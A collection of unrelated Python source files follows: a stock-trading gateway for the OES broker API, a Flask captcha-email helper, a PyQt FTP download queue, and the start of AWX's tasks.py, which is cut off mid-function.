eOesOrdStatusT.OES_ORD_STATUS_CANCELED: Status.CANCELLED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_OES: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SH_COMM: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_F: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_E: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_REJECT: Status.REJECTED,
eOesOrdStatusT.OES_ORD_STATUS_INVALID_SZ_TRY_AGAIN: Status.REJECTED,
}
bjtz = timezone(timedelta(hours=8))
@dataclass
class InternalOrder:
order_id: int = None
vt_order: OrderData = None
def parse_oes_datetime(date: int, time: int):
"""convert oes datetime to python datetime"""
# YYYYMMDD
year = int(date / 10000)
month = int((date % 10000) / 100)
day = int(date % 100)
# HHMMSSsss
hour = int(time / 10000000)
minute = int((time % 10000000) / 100000)
sec = int((time % 100000) / 1000)
mill = int(time % 1000)
return datetime(year, month, day, hour, minute, sec, mill * 1000, tzinfo=bjtz)
class OesTdMessageLoop:
def __init__(self,
gateway: BaseGateway,
env: OesApiClientEnvT,
td: "OesTdApi",
order_manager: "OrderManager",
):
""""""
self.gateway = gateway
self._env = env
self._td = td
self._order_manager = order_manager
self._alive = False
self._th = Thread(target=self._message_loop)
self.message_handlers: Dict[eOesMsgTypeT, Callable[[OesRspMsgBodyT], int]] = {
eOesMsgTypeT.OESMSG_RPT_BUSINESS_REJECT: self.on_order_rejected,
eOesMsgTypeT.OESMSG_RPT_ORDER_INSERT: self.on_order_inserted,
eOesMsgTypeT.OESMSG_RPT_ORDER_REPORT: self.on_order_report,
eOesMsgTypeT.OESMSG_RPT_TRADE_REPORT: self.on_trade_report,
eOesMsgTypeT.OESMSG_RPT_STOCK_HOLDING_VARIATION: self.on_stock_holding,
eOesMsgTypeT.OESMSG_RPT_OPTION_HOLDING_VARIATION: self.on_option_holding,
eOesMsgTypeT.OESMSG_RPT_CASH_ASSET_VARIATION: self.on_cash,
eOesMsgTypeT.OESMSG_RPT_REPORT_SYNCHRONIZATION: lambda x: 1,
eOesMsgTypeT.OESMSG_SESS_HEARTBEAT: lambda x: 1,
}
def start(self):
""""""
if not self._alive: # not thread-safe
self._alive = True
self._th.start()
def stop(self):
""""""
self._alive = False
def join(self):
""""""
self._th.join()
def reconnect(self):
""""""
self.gateway.write_log(_("正在尝试重新连接到交易服务器。"))
self._td.connect_rpt_channel()
def _on_message(self, session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any):
""""""
if session_info.protocolType == SMSG_PROTO_BINARY:
b = cast.toOesRspMsgBodyT(body)
if head.msgId in self.message_handlers:
self.message_handlers[head.msgId](b)
else:
self.gateway.write_log(
f"unknown msg id : {head.msgId} {eOesMsgTypeT(head.msgId)}")
else:
self.gateway.write_log(f"unknown prototype : {session_info.protocolType}")
return 1
def _message_loop(self):
""""""
rpt_channel = self._env.rptChannel
timeout_ms = 1000
while self._alive:
ret = OesApi_WaitReportMsg(rpt_channel,
timeout_ms,
self._on_message)
if ret < 0:
# if is_timeout(ret):
# pass # just no message
if is_disconnected(ret):
self.gateway.write_log(_("与交易服务器的连接已断开。"))
while self._alive and not self.reconnect():
pass
return
def on_order_rejected(self, d: OesRspMsgBodyT):
""""""
error_code = d.rptMsg.rptHead.ordRejReason
error_string = error_to_str(error_code)
data: OesOrdRejectT = d.rptMsg.rptBody.ordRejectRsp
if not data.origClSeqNo:
try:
i = self._order_manager.get_order(data.clSeqNo)
except KeyError:
return # rejected order created by others, don't need to care.
vt_order = i.vt_order
if vt_order == Status.ALLTRADED:
return
vt_order.status = Status.REJECTED
self.gateway.on_order(copy(vt_order))
self.gateway.write_log(
f"Order: {vt_order.vt_symbol}-{vt_order.vt_orderid} Code: {error_code} Rejected: {error_string}")
else:
self.gateway.write_log(f"撤单失败,订单号: {data.origClSeqNo}。原因:{error_string}")
def on_order_inserted(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.ordInsertRsp
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_order_report(self, d: OesRspMsgBodyT):
""""""
data: OesOrdCnfmT = d.rptMsg.rptBody.ordCnfm
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(copy(vt_order))
def on_trade_report(self, d: OesRspMsgBodyT):
""""""
data: OesTrdCnfmT = d.rptMsg.rptBody.trdCnfm
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
trade = TradeData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(data.clSeqNo),
tradeid=str(data.exchTrdNum),
direction=vt_order.direction,
offset=vt_order.offset,
price=data.trdPrice / 10000,
volume=data.trdQty,
time=parse_oes_datetime(data.trdDate, data.trdTime).isoformat()
)
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.traded = data.cumQty
vt_order.time = parse_oes_datetime(data.trdDate, data.trdTime)
self.gateway.on_trade(trade)
self.gateway.on_order(copy(vt_order))
def on_option_holding(self, d: OesRspMsgBodyT):
""""""
pass
def on_stock_holding(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.stkHoldingRpt
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
def on_cash(self, d: OesRspMsgBodyT):
""""""
data = d.rptMsg.rptBody.cashAssetRpt
balance = data.currentTotalBal
availiable = data.currentAvailableBal
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
frozen=balance - availiable,
)
self.gateway.on_account(account)
return 1
class OesTdApi:
def __init__(self, gateway: BaseGateway):
""""""
self.config_path: str = ''
self.ord_server: str = ''
self.qry_server: str = ''
self.rpt_server: str = ''
self.username: str = ''
self.password: str = ''
self.hdd_serial: str = ''
self.customize_ip: str = ''
self.customize_mac: str = ''
self.gateway = gateway
self._env = OesApiClientEnvT()
self._order_manager: "OrderManager" = OrderManager(self.gateway.gateway_name)
self._message_loop = OesTdMessageLoop(gateway,
self._env,
self,
self._order_manager
)
self._last_seq_lock = Lock()
self._last_seq_index = 1000000 # 0 has special manning for oes
self._ord_reconnect_lock = Lock()
def connect(self):
"""Connect to trading server.
:note set config_path before calling this function
"""
OesApi_InitLogger(self.config_path, 'log')
OesApi_SetCustomizedIpAndMac(self.customize_ip, self.customize_mac)
OesApi_SetCustomizedDriverId(self.hdd_serial)
if not self._connect_ord_channel():
self.gateway.write_log(_("无法初始化交易下单通道(td_ord_server)"))
if not self._connect_qry_channel():
self.gateway.write_log(_("无法初始化交易查询通道(td_qry_server)"))
if not self.connect_rpt_channel():
self.gateway.write_log(_("无法初始化交易查询通道(td_qry_server)"))
return True
def start(self):
""""""
self._message_loop.start()
def stop(self):
""""""
self._message_loop.stop()
OesApi_LogoutAll(self._env, True)
OesApi_DestoryAll(self._env)
def join(self):
""""""
self._message_loop.join()
def _get_new_seq_index(self):
""""""
with self._last_seq_lock:
index = self._last_seq_index
self._last_seq_index += 1
return index
def _connect_qry_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
return OesApi_InitQryChannel2(self._env.qryChannel,
create_remote_config(self.qry_server,
self.username,
self.password))
def _connect_ord_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
if not OesApi_InitOrdChannel2(self._env.ordChannel,
create_remote_config(self.ord_server,
self.username,
self.password),
0):
return False
self._last_seq_index = max(self._last_seq_index, self._env.ordChannel.lastOutMsgSeq + 1)
return True
def connect_rpt_channel(self):
OesApi_SetThreadUsername(self.username)
OesApi_SetThreadPassword(self.password)
subscribe_info = OesApiSubscribeInfoT()
subscribe_info.clEnvId = 0
subscribe_info.rptTypes = (eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_BUSINESS_REJECT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_INSERT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_ORDER_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_TRADE_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_FUND_TRSF_REPORT
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_CASH_ASSET_VARIATION
| eOesSubscribeReportTypeT.OES_SUB_RPT_TYPE_HOLDING_VARIATION
)
return OesApi_InitRptChannel2(self._env.rptChannel,
create_remote_config(self.rpt_server,
self.username,
self.password),
subscribe_info,
0)
def _reconnect_ord_channel(self):
with self._ord_reconnect_lock: # prevent spawning multiple reconnect thread
self.gateway.write_log(_("正在重新连接到交易下单通道"))
while not self._connect_ord_channel():
time.sleep(1)
self.gateway.write_log(_("成功重新连接到交易下单通道"))
def _schedule_reconnect_ord_channel(self):
Thread(target=self._reconnect_ord_channel, ).start()
def query_account(self):
""""""
OesApi_QueryCashAsset(self._env.qryChannel,
OesQryCashAssetFilterT(),
self.on_query_asset
)
def on_query_asset(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesCashAssetItemT(body)
balance = data.currentTotalBal / 10000
availiable = data.currentAvailableBal / 10000
# drawable = data.currentDrawableBal
account_id = data.cashAcctId
account = AccountData(
gateway_name=self.gateway.gateway_name,
accountid=account_id,
balance=balance,
frozen=balance - availiable,
)
self.gateway.on_account(account)
return 1
def query_stock(self, ) -> bool:
""""""
f = OesQryStockFilterT()
ret = OesApi_QueryStock(self._env.qryChannel, f, self.on_query_stock)
return ret >= 0
def on_query_stock(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesStockBaseInfoT = cast.toOesStockItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.buyQtyUnit,
min_volume=100,
net_position=True,
pricetick=data.priceUnit,
)
self.gateway.on_contract(contract)
return 1
def query_option(self) -> bool:
""""""
f = OesQryOptionFilterT()
ret = OesApi_QueryOption(self._env.qryChannel,
f,
self.on_query_option
)
return ret >= 0
def on_query_option(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptionItemT(body)
contract = ContractData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
name=data.securityName,
product=PRODUCT_OES2VT[data.mktId],
size=data.roundLot,
pricetick=data.tickSize,
)
self.gateway.on_contract(contract)
return 1
def query_stock_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
ret = OesApi_QueryStkHolding(self._env.qryChannel,
f,
self.on_query_stock_holding
)
return ret >= 0
def on_query_stock_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesStkHoldingItemT(body)
position = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.NET,
volume=data.sumHld,
frozen=data.lockHld,
price=data.costPrice / 10000,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=data.originalHld,
)
self.gateway.on_position(position)
return 1
def query_option_holding(self) -> bool:
""""""
f = OesQryStkHoldingFilterT()
f.mktId = eOesMarketIdT.OES_MKT_ID_UNDEFINE
ret = OesApi_QueryOptHolding(self._env.qryChannel,
f,
self.on_query_holding
)
return ret >= 0
def on_query_holding(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data = cast.toOesOptHoldingItemT(body)
# 权利
pos_long = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.LONG,
volume=data.hldA,
frozen=data.hldRA,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_long)
# 义务
pos_short = PositionData(
gateway_name=self.gateway.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
direction=Direction.SHORT,
volume=data.hldB,
frozen=data.hldRB,
price=0,
# pnl=data.costPrice - data.originalCostAmt,
pnl=0,
yd_volume=0,
)
self.gateway.on_position(pos_short)
return 1
def query_contracts(self):
""""""
self.query_stock()
# self.query_option()
# self.query_issue()
def query_position(self):
""""""
self.query_stock_holding()
self.query_option_holding()
def send_order(self, vt_req: OrderRequest):
""""""
seq_id = self._get_new_seq_index()
order_id = seq_id
oes_req = OesOrdReqT()
oes_req.clSeqNo = seq_id
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.ordType = ORDER_TYPE_VT2OES[(vt_req.exchange, vt_req.type)]
oes_req.bsType = BUY_SELL_TYPE_VT2OES[(vt_req.exchange, vt_req.offset, vt_req.direction)]
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
oes_req.ordQty = int(vt_req.volume)
oes_req.ordPrice = int(vt_req.price * 10000)
oes_req.origClOrdId = order_id
order = vt_req.create_order_data(str(order_id), self.gateway.gateway_name)
order.direction = Direction.NET # fix direction into NET: stock only
self._order_manager.save_order(order_id, order)
ret = OesApi_SendOrderReq(self._env.ordChannel,
oes_req
)
if ret >= 0:
order.status = Status.SUBMITTING
else:
order.status = Status.REJECTED
self.gateway.write_log(_("下单失败")) # todo: can I stringify error?
if is_disconnected(ret):
self.gateway.write_log(_("下单时连接发现连接已断开,正在尝试重连"))
self._schedule_reconnect_ord_channel()
self.gateway.on_order(order)
return order.vt_orderid
def cancel_order(self, vt_req: CancelRequest):
""""""
seq_id = self._get_new_seq_index()
oes_req = OesOrdCancelReqT()
order_id = int(vt_req.orderid)
oes_req.mktId = EXCHANGE_VT2OES[vt_req.exchange]
oes_req.clSeqNo = seq_id
oes_req.origClSeqNo = order_id
oes_req.invAcctId = ""
oes_req.securityId = vt_req.symbol
ret = OesApi_SendOrderCancelReq(self._env.ordChannel,
oes_req)
if ret < 0:
self.gateway.write_log(_("撤单失败")) # todo: can I stringify error?
if is_disconnected(ret): # is here any other ret code indicating connection lost?
self.gateway.write_log(_("撤单时连接发现连接已断开,正在尝试重连"))
self._schedule_reconnect_ord_channel()
def query_order(self, internal_order: InternalOrder) -> bool:
""""""
f = OesQryOrdFilterT()
f.mktId = EXCHANGE_VT2OES[internal_order.vt_order.exchange]
f.clSeqNo = internal_order.order_id
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_order
)
return ret >= 0
def on_query_order(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
i = self._order_manager.get_order(data.clSeqNo)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
self.gateway.on_order(copy(vt_order))
return 1
def query_orders(self) -> bool:
""""""
f = OesQryOrdFilterT()
ret = OesApi_QueryOrder(self._env.qryChannel,
f,
self.on_query_orders
)
return ret >= 0
def on_query_orders(self,
session_info: SGeneralClientChannelT,
head: SMsgHeadT,
body: Any,
cursor: OesQryCursorT,
):
""""""
data: OesOrdCnfmT = cast.toOesOrdItemT(body)
vt_order = self._order_manager.oes_order_to_vt(data)
self.gateway.on_order(vt_order)
return 1
class OrderManager:
def __init__(self, gateway_name: str):
self._orders: Dict[int, InternalOrder] = {}
self.gateway_name = gateway_name
def oes_order_to_vt(self, data):
order_id = data.clSeqNo
if hasattr(data, "origClSeqNo") and data.origClSeqNo:
order_id = data.origClSeqNo
try:
i = self.get_order(order_id)
vt_order = i.vt_order
vt_order.status = STATUS_OES2VT[data.ordStatus]
vt_order.volume = data.ordQty
vt_order.traded = data.cumQty
vt_order.time = parse_oes_datetime(data.ordDate, data.ordTime).isoformat()
except KeyError:
if data.bsType == eOesBuySellTypeT.OES_BS_TYPE_BUY:
offset = Offset.OPEN
else:
offset = Offset.CLOSE
vt_order = OrderData(
gateway_name=self.gateway_name,
symbol=data.securityId,
exchange=EXCHANGE_OES2VT[data.mktId],
orderid=str(order_id if order_id else data.origClSeqNo), # generated id
type=ORDER_TYPE_OES2VT[(data.mktId, data.ordType)],
direction=Direction.NET,
offset=offset,
price=data.ordPrice / 10000,
volume=data.ordQty,
traded=data.cumQty,
status=STATUS_OES2VT[
data.ordStatus],
# this time should be generated automatically or by a static function
time=parse_oes_datetime(data.ordDate, data.ordCnfmTime).isoformat(),
)
self.save_order(order_id, vt_order)
return vt_order
def save_order(self, order_id: int, order: OrderData):
""""""
self._orders[order_id] = InternalOrder(
order_id=order_id,
vt_order=order,
)
def get_order(self, order_id: int):
""""""
return self._orders[order_id]
|
emails.py
|
# -*- coding:utf-8 -*-
"""
:author: Albert Li
:copyright: © 2020 Albert Li
:time: 2020/1/14 11:33
"""
from threading import Thread
from flask import current_app
from flask_mail import Message
from app.extensions import mail
def _send_async_mail(app, message: Message):
"""异步发送邮件"""
# 异步发送将开启一个新的线程, 执行上下文已经不在 app 内, 必须使用 with 语句进入 app 上下文才可以执行 mail 对象
with app.app_context():
mail.send(message)
def send_mail(
to: list, title: str, mail_html: str = None, mail_body: str = None
) -> Thread:
"""发送邮件
:param to: 收信人的邮箱地址列表
:param title: 邮件的标题
:param mail_html: html 格式的邮件内容
:param mail_body: 纯文本的邮件内容,收信人会优先读取 html,如果邮件系统不支持,再读取 body
"""
app = current_app._get_current_object() # 获取原始的 app 实例
message = Message(title, recipients=to)
message.html = mail_html
message.body = mail_body
thr = Thread(target=_send_async_mail, args=[app, message]) # 异步发送邮件
thr.start()
return thr
def send_register_mail(to: str, captcha: str) -> Thread:
"""用户注册时,发送的验证码邮件
:param to: 收信人的邮箱地址
:param captcha: 验证码
"""
return send_mail(
[to],
u"iGank 用户注册验证码",
u'<p>您正在进行【iGank】的用户注册操作,您的验证码是<b style="font-size:1.5rem;color:#1F58B6;"> {captcha}</b>,10分钟内有效。</p>'.format(
captcha=captcha
),
u"您正在进行【iGank】的用户注册操作,您的验证码是 {captcha},10分钟内有效".format(captcha=captcha),
)
def send_forgetpwd_mail(to: str, captcha: str) -> Thread:
"""忘记密码时,发送的验证码邮件
:param to: 收信人的邮箱地址
:param captcha: 验证码
"""
return send_mail(
[to],
u"iGank 忘记密码验证码",
u'<p>您正在进行【iGank】的忘记密码操作,您的验证码是<b style="font-size:1.5rem;color:#1F58B6;"> {captcha}</b>,10分钟内有效。</p>'.format(
captcha=captcha
),
u"您正在进行【iGank】的忘记密码操作,您的验证码是 {captcha},10分钟内有效".format(captcha=captcha),
)
|
downloader.py
|
from ftpclient import FTPClient
import ftplib
import threading, os, time
from queue import Queue
from PyQt5.QtGui import QIcon, QPixmap
configFile = 'ftp-client.conf'
class Node:
def __init__(self, hostname='locahost', port=2121, filesize=0, filename=None, destpath='', pathname=None, guiwidget=None):
if (not filename or not pathname):
return None
self.hostname = hostname
self.port = port
self.filesize = filesize
self.filename = filename
self.pathname = pathname
self.tries = 0
self.destpath = destpath
self.guiwidget = guiwidget
class Downloader:
def __init__(self):
self.downloadQueue = Queue(maxsize=0)
self.maxWorkers = 2
self.execute = True
self.lock = threading.Lock()
self.getDownloadPath()
self.threadMonitor = threading.Thread(target=self.running_listener)
self.threadMonitor.setDaemon(True)
self.threadMonitor.start()
def running_listener(self):
while True:
if self.execute == True and threading.active_count() == 2:
for i in range(self.maxWorkers):
worker = threading.Thread(target=self.downloader)
worker.setDaemon(True)
worker.start()
time.sleep(1)
def getDownloadPath(self):
try:
conf = open(configFile, 'r')
self.downloadPath = conf.readline().strip()
conf.close()
if (len(self.downloadPath) == 0):
raise IOError
except IOError:
self.downloadPath = os.path.join(os.path.expanduser('~'), 'Download')
def downloader(self):
completion = False
# Thread to monitor download stats
# ... commented as it caused lags.
# will try to implement in future versions
# def stats_monitor(filename, total_size, guiwidget, destpath):
# if destpath.startswith('/'):
# destpath = destpath[1:]
# downloadPath = self.downloadPath
# if (destpath != ''):
# downloadPath = os.path.join(downloadPath, destpath)
# destination = os.path.join(downloadPath, destpath)
# guiwidget['state'] = 'running'
# while guiwidget['state'] =='running':
# try:
# size = os.path.getsize(os.path.join(destination, filename))
# guiwidget['label'].setText( str(100 * int(size//total_size))+' % Running' )
# time.sleep(2)
# except Exception as e:
# pass
while True and self.execute:
self.lock.acquire()
node = self.downloadQueue.get()
self.lock.release()
completion = False
total_size = node.filesize
guiwidget = node.guiwidget
guiwidget['statusicon'].setText("In Queue")
client = FTPClient(node.hostname, node.port)
filename = node.filename
destpath = node.destpath
# th = threading.Thread(target=stats_monitor, args=(filename, total_size, guiwidget, destpath,))
# th.setDaemon(False)
# th.start()
node.tries += 1
node.guiwidget['label'].setText("Downloading")
node.guiwidget['statusicon'].setPixmap(QPixmap('icons/running.svg'))
try:
if (node.tries < 4 and client.downloadFile(pathname=node.pathname, filename=node.filename, destpath=node.destpath)):
guiwidget['label'].setText("Completed")
guiwidget['statusicon'].setPixmap(QPixmap('icons/complete.svg'))
node.guiwidget['state'] = 'completed'
else:
if (node.tries == 4):
guiwidget['label'].setText("Failed")
guiwidget['statusicon'].setPixmap(QPixmap('icons/failed.svg'))
node.guiwidget['state'] = 'failed'
else:
self.downloadQueue.put(node)
guiwidget['label'].setText("Waiting")
guiwidget['statusicon'].setPixmap(QPixmap('icons/wait.svg'))
node.guiwidget['state'] = 'waiting'
self.downloadQueue.task_done()
completion = True
except Exception as e:
node.guiwidget['statusicon'].setPixmap(QPixmap('icons/failed.svg'))
node.guiwidget['label'].setText("Network error. Retry")
raise e
pass
def addEntry(self, pathname, filesize, filename, guiwidget, destpath='', hostname='localhost', port=2121):
node = Node(hostname=hostname, port=port, pathname=pathname, filesize=filesize, filename=filename, guiwidget=guiwidget, destpath=destpath)
if not Node:
node.guiWidget['state'] = 'failed'
return False
self.downloadQueue.put(node)
|
tasks.py
|
# -*- coding: utf-8 -*-
# Copyright (c) 2015 Ansible, Inc.
# All Rights Reserved.
# Python
from collections import OrderedDict, namedtuple
import errno
import functools
import importlib
import json
import logging
import os
import shutil
import stat
import tempfile
import time
import traceback
from distutils.dir_util import copy_tree
from distutils.version import LooseVersion as Version
import yaml
import fcntl
from pathlib import Path
from uuid import uuid4
import urllib.parse as urlparse
import socket
import threading
import concurrent.futures
from base64 import b64encode
import subprocess
import sys
# Django
from django.conf import settings
from django.db import transaction, DatabaseError, IntegrityError, ProgrammingError, connection
from django.db.models.fields.related import ForeignKey
from django.utils.timezone import now
from django.utils.encoding import smart_str
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _, gettext_noop
from django.core.cache import cache
from django.core.exceptions import ObjectDoesNotExist
from django_guid.middleware import GuidMiddleware
# Django-CRUM
from crum import impersonate
# GitPython
import git
from gitdb.exc import BadName as BadGitName
# Runner
import ansible_runner
# Receptor
from receptorctl.socket_interface import ReceptorControl
# AWX
from awx import __version__ as awx_application_version
from awx.main.constants import PRIVILEGE_ESCALATION_METHODS, STANDARD_INVENTORY_UPDATE_ENV
from awx.main.access import access_registry
from awx.main.redact import UriCleaner
from awx.main.models import (
Schedule,
TowerScheduleState,
Instance,
InstanceGroup,
UnifiedJob,
Notification,
Inventory,
InventorySource,
SmartInventoryMembership,
Job,
AdHocCommand,
ProjectUpdate,
InventoryUpdate,
SystemJob,
JobEvent,
ProjectUpdateEvent,
InventoryUpdateEvent,
AdHocCommandEvent,
SystemJobEvent,
build_safe_env,
)
from awx.main.constants import ACTIVE_STATES
from awx.main.exceptions import AwxTaskError, PostRunError
from awx.main.queue import CallbackQueueDispatcher
from awx.main.dispatch.publish import task
from awx.main.dispatch import get_local_queuename, reaper
from awx.main.utils import (
update_scm_url,
ignore_inventory_computed_fields,
ignore_inventory_group_removal,
extract_ansible_vars,
schedule_task_manager,
get_awx_version,
deepmerge,
parse_yaml_or_json,
cleanup_new_process,
)
from awx.main.utils.execution_environments import get_default_execution_environment, get_default_pod_spec, CONTAINER_ROOT, to_container_path
from awx.main.utils.ansible import read_ansible_config
from awx.main.utils.external_logging import reconfigure_rsyslog
from awx.main.utils.safe_yaml import safe_dump, sanitize_jinja
from awx.main.utils.reload import stop_local_services
from awx.main.utils.pglock import advisory_lock
from awx.main.utils.handlers import SpecialInventoryHandler
from awx.main.consumers import emit_channel_notification
from awx.main import analytics
from awx.conf import settings_registry
from awx.conf.license import get_license
from awx.main.analytics.subsystem_metrics import Metrics
from rest_framework.exceptions import PermissionDenied
__all__ = [
'RunJob',
'RunSystemJob',
'RunProjectUpdate',
'RunInventoryUpdate',
'RunAdHocCommand',
'handle_work_error',
'handle_work_success',
'apply_cluster_membership_policies',
'update_inventory_computed_fields',
'update_host_smart_inventory_memberships',
'send_notifications',
'purge_old_stdout_files',
]
HIDDEN_PASSWORD = '**********'
OPENSSH_KEY_ERROR = u'''\
It looks like you're trying to use a private key in OpenSSH format, which \
isn't supported by the installed version of OpenSSH on this instance. \
Try upgrading OpenSSH or providing your private key in an different format. \
'''
logger = logging.getLogger('awx.main.tasks')
class InvalidVirtualenvError(Exception):
def __init__(self, message):
self.message = message
def dispatch_startup():
startup_logger = logging.getLogger('awx.main.tasks')
startup_logger.debug("Syncing Schedules")
for sch in Schedule.objects.all():
try:
sch.update_computed_fields()
except Exception:
logger.exception("Failed to rebuild schedule {}.".format(sch))
#
# When the dispatcher starts, if the instance cannot be found in the database,
# automatically register it. This is mostly useful for openshift-based
# deployments where:
#
# 2 Instances come online
# Instance B encounters a network blip, Instance A notices, and
# deprovisions it
# Instance B's connectivity is restored, the dispatcher starts, and it
# re-registers itself
#
# In traditional container-less deployments, instances don't get
# deprovisioned when they miss their heartbeat, so this code is mostly a
# no-op.
#
apply_cluster_membership_policies()
cluster_node_heartbeat()
Metrics().clear_values()
# Update Tower's rsyslog.conf file based on loggins settings in the db
reconfigure_rsyslog()
def inform_cluster_of_shutdown():
try:
this_inst = Instance.objects.get(hostname=settings.CLUSTER_HOST_ID)
this_inst.capacity = 0 # No thank you to new jobs while shut down
this_inst.save(update_fields=['capacity', 'modified'])
try:
reaper.reap(this_inst)
except Exception:
logger.exception('failed to reap jobs for {}'.format(this_inst.hostname))
logger.warning('Normal shutdown signal for instance {}, ' 'removed self from capacity pool.'.format(this_inst.hostname))
except Exception:
logger.exception('Encountered problem with normal shutdown signal.')
@task(queue=get_local_queuename)
def apply_cluster_membership_policies():
started_waiting = time.time()
with advisory_lock('cluster_policy_lock', wait=True):
lock_time = time.time() - started_waiting
if lock_time > 1.0:
to_log = logger.info
else:
to_log = logger.debug
to_log('Waited {} seconds to obtain lock name: cluster_policy_lock'.format(lock_time))
started_compute = time.time()
all_instances = list(Instance.objects.order_by('id'))
all_groups = list(InstanceGroup.objects.prefetch_related('instances'))
total_instances = len(all_instances)
actual_groups = []
actual_instances = []
Group = namedtuple('Group', ['obj', 'instances', 'prior_instances'])
Node = namedtuple('Instance', ['obj', 'groups'])
# Process policy instance list first, these will represent manually managed memberships
instance_hostnames_map = {inst.hostname: inst for inst in all_instances}
for ig in all_groups:
group_actual = Group(obj=ig, instances=[], prior_instances=[instance.pk for instance in ig.instances.all()]) # obtained in prefetch
for hostname in ig.policy_instance_list:
if hostname not in instance_hostnames_map:
logger.info("Unknown instance {} in {} policy list".format(hostname, ig.name))
continue
inst = instance_hostnames_map[hostname]
group_actual.instances.append(inst.id)
# NOTE: arguable behavior: policy-list-group is not added to
# instance's group count for consideration in minimum-policy rules
if group_actual.instances:
logger.debug("Policy List, adding Instances {} to Group {}".format(group_actual.instances, ig.name))
actual_groups.append(group_actual)
# Process Instance minimum policies next, since it represents a concrete lower bound to the
# number of instances to make available to instance groups
actual_instances = [Node(obj=i, groups=[]) for i in all_instances if i.managed_by_policy]
logger.debug("Total instances: {}, available for policy: {}".format(total_instances, len(actual_instances)))
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_min_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if len(g.instances) >= g.obj.policy_instance_minimum:
break
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via the policy list
continue
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_min_added.append(i.obj.id)
if policy_min_added:
logger.debug("Policy minimum, adding Instances {} to Group {}".format(policy_min_added, g.obj.name))
# Finally, process instance policy percentages
for g in sorted(actual_groups, key=lambda x: len(x.instances)):
policy_per_added = []
for i in sorted(actual_instances, key=lambda x: len(x.groups)):
if i.obj.id in g.instances:
# If the instance is already _in_ the group, it was
# applied earlier via a minimum policy or policy list
continue
if 100 * float(len(g.instances)) / len(actual_instances) >= g.obj.policy_instance_percentage:
break
g.instances.append(i.obj.id)
i.groups.append(g.obj.id)
policy_per_added.append(i.obj.id)
if policy_per_added:
logger.debug("Policy percentage, adding Instances {} to Group {}".format(policy_per_added, g.obj.name))
# Determine if any changes need to be made
needs_change = False
for g in actual_groups:
if set(g.instances) != set(g.prior_instances):
needs_change = True
break
if not needs_change:
